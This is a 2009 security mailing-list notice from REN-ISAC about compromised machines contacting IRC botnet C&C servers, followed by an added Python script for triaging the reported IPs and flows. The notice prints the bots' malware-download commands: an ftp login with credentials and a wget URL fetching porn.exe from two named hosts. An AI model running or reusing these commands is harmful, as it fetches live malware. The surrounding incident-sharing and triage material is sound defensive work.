[nsp-sec] IRC bot C&C

Gabriel Iovino giovino at ren-isac.net
Fri Jun 19 17:59:00 EDT 2009


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings,

A trusted source has passed along ~11000 IPs that were seen connecting
to multiple IRC C&Cs at the institution.

When the compromised machine connected to the IRC it was instructed to
download:

porn.exe via ftp 89.248.166.8

OR

porn.exe via wget 64.85.170.38

These were both online today with additional .exe's on the ftp site. (I
do have those if you want them or if it goes offline)

[FTP]

ftp 89.248.166.8 21 fgt dongs porn.exe
(user = ftg | pass = dongs)

[wget]
wget hxxp://64.85.170.38/porn.exe

I suppose we should try to get 89.248.166.8 and 64.85.170.38 taken
offline unless someone has a reason to leave them up.

> AS      | IP               | AS Name
> 29073   | 89.248.166.8     | ECATEL-AS AS29073, Ecatel Network
> 30517   | 64.85.170.38     | GREAT-LAKES-COMNET - Great Lakes Comnet, Inc.

Attached are the ~11000 IPs that were seen connecting to the IRC C&Cs.

Data in the info field is space delimited:

1. # of flow inbound to c&c
2. First time seen (GMT -0400)
3. SrcPort
4. Last time seen (GMT -0400)
5. SrcPort

Please take whatever actions you deem appropriate and please let me know
if you have any questions or comments.

Regards,

Gabe

- --
Gabriel Iovino
Principal Security Engineer, REN-ISAC
http://www.ren-isac.net
24x7 Watch Desk +1(317)278-6630
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAko8CiQACgkQwqygxIz+pTvjXgCfTogln8ftgjLQGVyOPDyN22nH
Qs0AoKhf0dylx7Hxz4ND0mLrZNtxX8J7
=YYy9
-----END PGP SIGNATURE-----
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: asn.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090619/419604bc/attachment-0001.txt>
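Working the attached list against your own address space is the first thing a recipient of this notice does, so here is an added triage example. It is not code from the post, from REN-ISAC or from the attachment; it assumes each attachment line reads "<ip> <info>" with the info field laid out as the post describes (flow count, first seen, SrcPort, last seen, SrcPort), that the timestamps look like "YYYY-MM-DDTHH:MM:SS" in GMT -0400, and that the two SrcPort values are the source port at first and at last sight. The sample attachment lines and flow records are constructed for the example; only the two download-host IPs come from the post.

```python
"""Triage helpers for an IRC C&C sighting list (added example, not the post's code).
Assumed line layout: "<ip> <flows> <first_seen> <src_port> <last_seen> <src_port>".
"""
import ipaddress
from datetime import datetime, timedelta, timezone
from typing import List, NamedTuple, Tuple

# The post states its timestamps are GMT -0400; everything is normalised to UTC.
REPORT_TZ = timezone(timedelta(hours=-4))
TS_FORMAT = "%Y-%m-%dT%H:%M:%S"  # assumed layout of the timestamp fields

# Download hosts named in the post, keyed for flow matching.
DOWNLOAD_HOSTS = {
    ipaddress.ip_address("89.248.166.8"): "porn.exe via ftp (AS29073 ECATEL)",
    ipaddress.ip_address("64.85.170.38"): "porn.exe via wget (AS30517 GREAT-LAKES-COMNET)",
}


class Sighting(NamedTuple):
    ip: ipaddress.IPv4Address
    flows: int
    first_seen: datetime  # UTC
    src_port_first: int
    last_seen: datetime   # UTC
    src_port_last: int


def parse_ts(raw: str) -> datetime:
    """Parse a report timestamp (GMT -0400) and return it as a UTC datetime."""
    local = datetime.strptime(raw, TS_FORMAT).replace(tzinfo=REPORT_TZ)
    return local.astimezone(timezone.utc)


def parse_line(line: str) -> Sighting:
    """Parse one attachment line; raises ValueError on malformed input."""
    parts = line.split()
    if len(parts) != 6:
        raise ValueError(f"expected 6 space-delimited fields, got {len(parts)}")
    ip, flows, first, sport_first, last, sport_last = parts
    return Sighting(
        ip=ipaddress.IPv4Address(ip),  # AddressValueError is a ValueError
        flows=int(flows),
        first_seen=parse_ts(first),
        src_port_first=int(sport_first),
        last_seen=parse_ts(last),
        src_port_last=int(sport_last),
    )


def load_sightings(text: str) -> Tuple[List[Sighting], List[str]]:
    """Parse every line, returning (sightings, rejected raw lines) so bad rows are visible."""
    good, bad = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        try:
            good.append(parse_line(line))
        except ValueError:
            bad.append(line)
    return good, bad


def sightings_in(sightings: List[Sighting], netblocks: List[str]) -> List[Sighting]:
    """Keep only sightings whose IP falls inside one of our own netblocks."""
    nets = [ipaddress.ip_network(n) for n in netblocks]
    return [s for s in sightings if any(s.ip in n for n in nets)]


def match_download_hosts(flows):
    """Flag (src, sport, dst, dport) flows whose destination is a reported download host."""
    hits = []
    for src, _sport, dst, dport in flows:
        dst_ip = ipaddress.ip_address(dst)
        if dst_ip in DOWNLOAD_HOSTS:
            hits.append((src, dst, dport, DOWNLOAD_HOSTS[dst_ip]))
    return hits


# Constructed sample attachment (RFC 5737 addresses), including one bad row.
SAMPLE_ATTACHMENT = """\
192.0.2.10 37 2009-06-18T03:14:05 1043 2009-06-19T11:02:44 1117
203.0.113.77 2 2009-06-19T09:00:00 2201 2009-06-19T09:00:30 2201
198.51.100.5 garbage line that should be rejected
"""

# Constructed flow records as (src_ip, src_port, dst_ip, dst_port).
SAMPLE_FLOWS = [
    ("192.0.2.10", 40123, "89.248.166.8", 21),
    ("192.0.2.10", 40124, "64.85.170.38", 80),
    ("192.0.2.11", 51000, "198.51.100.99", 443),
]

if __name__ == "__main__":
    parsed, rejected = load_sightings(SAMPLE_ATTACHMENT)
    for s in sightings_in(parsed, ["192.0.2.0/24"]):
        print(f"{s.ip}: {s.flows} flows, first {s.first_seen.isoformat()}, last {s.last_seen.isoformat()}")
    print(f"rejected {len(rejected)} line(s)")
    for src, dst, dport, why in match_download_hosts(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport}  {why}")
```

Rejected rows are returned rather than silently dropped, because a list of ~11000 entries from a third party will contain a few that do not fit the stated layout, and those are the ones to eyeball. The flow matcher keys on the destination host only, not the port, since the post gives both an ftp and an http path to the same payload and the ftp site was hosting additional executables.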

